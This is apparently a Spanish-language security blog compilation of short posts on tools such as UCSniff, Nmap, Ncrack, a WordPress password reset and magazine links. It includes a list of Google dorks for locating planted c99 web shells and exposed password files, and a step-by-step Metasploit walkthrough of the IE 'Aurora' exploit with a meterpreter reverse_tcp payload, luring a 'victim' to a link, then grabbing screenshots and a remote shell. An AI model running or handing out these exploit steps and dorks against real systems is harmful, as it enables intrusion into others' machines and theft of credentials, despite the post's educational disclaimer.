Recientemente he recibido por medio de una lista de discusión sobre temas de seguridad, dos enlaces a libros que están públicos en la web, que tienen elementos de interés para los profesionales y estudiantes de la seguridad de la información. Espero sean de utilidad.
Libro 1 –> Security analysis And Data Visualization
Libro 2 –> Attack Simulation and Threat Modeling
Anteriormente en RinconInformatico hemos hablado de SIPvicius una herramienta que nos sirve para auditar, SIP basados en sistemas VoIP. En esta ocasión hablaremos de UCSniff una potente herramienta que hace el papel de sniffer, logrando capturar todas las conversaciones que pasan por nuestra red.
Las características de UCSniff son:
La instalación es relativamente sencilla, pueden visitar la pagina oficial del proyecto haciendo click aqui allí pueden encontrar los archivos para la instalación, ya sea las fuentes o el paquete precompilado para Debian.
Después de la instalación ejecutaremos la aplicacion de esta forma:
root@epsilon-laptop:~# ucsniff -G
Lo que nos arrojara este pantallazo:
Desde allí podremos activar el sniffer según los parámetros que deseemos, un ejemplo básico que puede funcionar y servir, seria el siguiente:
Igualmente hay muchas variables y parámetros las cuales se pueden modificar según nuestro contexto y entorno, recomiendo la lectura del manual de la aplicacion, muy interesante y poderosa
Bueno en esta oportunidad quiero compartir con ustedes esta cheatsheet de Nmap que fue creado por la gente de securitybydefault.
Para los que no saben que es Nmap aquí le dejo una definicion de la wikipedia “Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos. Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.”
Espero y les sea de gran utilidad.
CheatSheet –> Aquí
Fuente –> Aquí
Podríamos definir Google Dorks como búsquedas avanzadas mediante el uso de operadores complejos que google pone a nuestra disposición, mediante el uso de estas facilidades podemos ahorrarnos el trabajo de buscar vulnerabilidades y dejar que google nos muestra las que encontró y tiene indexadas.
Advertencias, estos datos solo se proveen con fines educativos, el mal uso de los mismos es pura responsabilidad de cada uno.
Vamos con unos ejemplos
Dorks para búsqueda de shells
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
“Captain Crunch Security Team” inurl:c99
download c99.php
download c99.php
download c99.php
inurl:c99.php
inurl:c99.php
allinurl: c99.php
inurl:c99.php
allinurl: c99.php
inurl:”/c99.php”
allinurl: c99.php
inurl:c99.php
inurl:”c99.php” c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:”/c99.php”
inurl:c99.php
inurl:c99.php
inurl:c99.php
Dorks para hacking de contraseñas
Filetype: htpasswd htpasswd
Intitle:”Index of” “.htpasswd” -intitle:”dist” -apache -htpasswd.c
index.of.private (algo privado)
Intitle:index.of master.passwd
inurlasslist.txt (Para encontrar listas de passwords)
intitle:”Index of..etc” passwd
intitle:admin intitle:login
“Incorrect syntax near” (SQL script error)
intitle:”the page cannot be found” inetmgr (debilidad en IIS4)
intitle:index.of ws_ftp.ini
“A supplied argument is not a valid PostgreSQL result” (possible debilidad SQL)
_vti_pvt password intitle:index.of (Frontpage)
inurl:backup intitle:index.of inurl:admin
“Index of /backup”
index.of.password
index.of.winnt
En este archivo podrás encontrar más ejemplos de google dorks: Dorks
En esta web podrás encontrar más recursos –> AQUI
Navegando en el foro de la comunidad DragonJAR me encontre un post muy interesante, en el cual un usuario, muy amablemente nos comparte 51 numeros de la revista NEX IT. Esta revista esta catalogada como una de las mejores revistas del habla hispana, en ella se encontraran temas muy importantes y llamativos en el campo de la seguridad, las redes y los sistemas operativos. Segun su web, la revista va dirigida hacia:
empresas dedicadas a las tecnologías de la información y/o aquellas que apoyan sus negocios en la tecnología. También está orientado a personas con un particular interés en seguridad y administración de redes o programación, administradores de sistemas, encargados de seguridad informática, empresas de diseño y hosting de páginas web. Para aquellos estudiantes universitarios de las carreras de sistemas y para quienes estén buscando las Certificaciones Internacionales de Cisco (CCNA, CCNP), Microsoft (MCSA, MCSE, MCAD, MCSD, MCDBA), Linux (LPI, Linux+) les será también de gran utilidad.
He leido algunos numeros, y aunque los primeros incluyen temas un poco viejos (ya que son del 2002) hay conceptos que todavia se utilizan como IpSec o el mismo Active directory los cuales depronto muchos de nosotros no tenemos muy claros.
Me tome la tarea de subir todos los numeros en 3 paquetes grandes, espero que los descarguen y se animen a leer y aprender un poco mas.
Si alguna vez te olvidas o te roban la contraseña de tu blog en wordpress y por alguna razon(quizas la persona que te la quito cambio el correo de tu usuario), la funcion de “olvido contraseña” no sirve… no te preocupes, puedes recuperarla de forma sencilla, siempre y cuando tengas acceso al servidor de bases de datos, (MYSQL). Antes de comenzar con el procedimiento hay que aclarar que este metodo solo sirve para aquellos blogs que usen Wordpress como CMS y que esten alojados en hosting propio, es decir para aquellos blogs que se encuentran en wordpress.com, no les sirve el proceso que vamos a enunciar acontinuacion:
Y eso es todo, de esta forma al iniciar de nuevo sesion en wordpress digitaremos nuestro usuario y la nueva contraseña que asignamos. Si no hay problema alguno, estaremos de nuevo en nuestro dashboard
Hace pocos días, Google y otras grandes empresas recibieron un ciberataque denominado “Aurora” el cual aprovechaba una nueva vulnerabilidad de tipo 0-day en Internet explorer que permite la ejecución remota de código en las maquinas vulnerables. Cito la noticia:
McAfee Labs ha estado trabajando contra reloj para evaluar cómo se realizó el ciberataque al que han bautizado como Aurora y que afectó tanto a Google como a varias decenas de empresas y a sus servidores de correo. Una de las causas de este ataque ha sido la aparición de una nueva vulnerabilidad Zero Day en Internet Explorer, que se descubrió recientemente gracias a esas tareas de investigación y sobre la que Microsoft ya ha publicado sus propias notas.
Según los estudios de McAfee, los intrusos ganaron accesos a las organizaciones mandando ataques a medida a ciertas personas que se supone que tienen permisos de acceso especiales. La combinación de mensajes que parecían provenir de fuentes de confianza y de la vulnerabilidad en IE puede haber sido la base de dichos ataques, según la firma de seguridad
Observando el impacto que tuvo dicha vulnerabilidad, acá en RinconInformatico.NET quisimos hacer una prueba de concepto (al igual como lo hicimos con una vulnerabilidad de Firefox) para comprobar lo fácil que es la explotacion de este fallo.
Antes de empezar es oportuno aclarar que esta prueba fue hecha con un Windows XP SP2 e I6, según otras fuentes el exploit que se encuentra en el metasploit solo es efectivo con IE6, sin embargo, el exploit que pueden encontrar aqui sirve para todas las versiones de Internet explorer.
Después de tener nuestro metasploit framework abrimos la consola:
msfconsole
Ahora procedemos a seleccionar el exploit y darle los parámetros adecuados:
use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (nuestra ip)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
Después de lanzar el exploit, debemos decirle a la víctima que acceda al siguiente enlace (LOCAL IP) en este caso es el siguiente:
http://192.168.1.4:8080/
Inmediatamente nuestra víctima abre el enlace malicioso veremos como el metasploit empieza a trabajar, hasta que nos abre una sesión. El siguiente paso es seleccionar la sesión:
sessions -i 1 // donde 1 es el id de la sesión que se ha creado.
Si todo ha salido bien tendremos el prompt de meterpreter, desde donde podemos hacer muchas cosas interesantes, como tomar un screenshot del escritorio de la víctima, saber el nombre del equipo con su grupo de trabajo, o en su defecto tener un shell remota de nuestro equipo víctima. algunos ejemplos:
meterpreter > use espia
meterpreter > screenshot victima1.bmp // el screenshot quedara en tu escritorio
meterpreter> shell // obtendremos una shell donde podemos hacer lo que deseemos.
Por ultimo, no sobra decir que este es un laboratorio informativo, es decir, un prueba de concepto, el que haga esto no es un hacker. La idea de esta entrada no es ejecutar un exploit, es tratar de entender como es su funcionamiento y la forma de implementarlo.
Recientemente me entero de una nueva alternativa diferente a hydra y medusa(del cual ya hemos hablado en RinconInformatico.NET) para realizar ataques por fuerza bruta. Aunque estas dos aplicaciones cumplen su trabajo casi a la perfeccion, la gente de Insecure.org (si los mismos creadores de nmap) han desarrollado Ncrack una herramienta que nos permite realizar ataques con fuerza bruta dirigidos hacia diferentes protocolos.
Sin embargo Ncrack todavia se encuentra en version “ALPHA” ya que faltan algunas cosas por terminar, pero la herramienta pinta bastante bien, entre sus caracteristicas tenemos:
La instalacion en GNU/Linux es sencilla, descargamos el paquete desde aca, y ejecutamos:
./configure
make
make install
Ncrack posee un sin fin de opciones, les recomiendo que lean el manual, para que puedan explorar a fondo la aplicacion, en esta pagina encontraran toda la informacion necesaria (sintaxis, opciones, etc), y algunos ejemplos basicos de su uso.
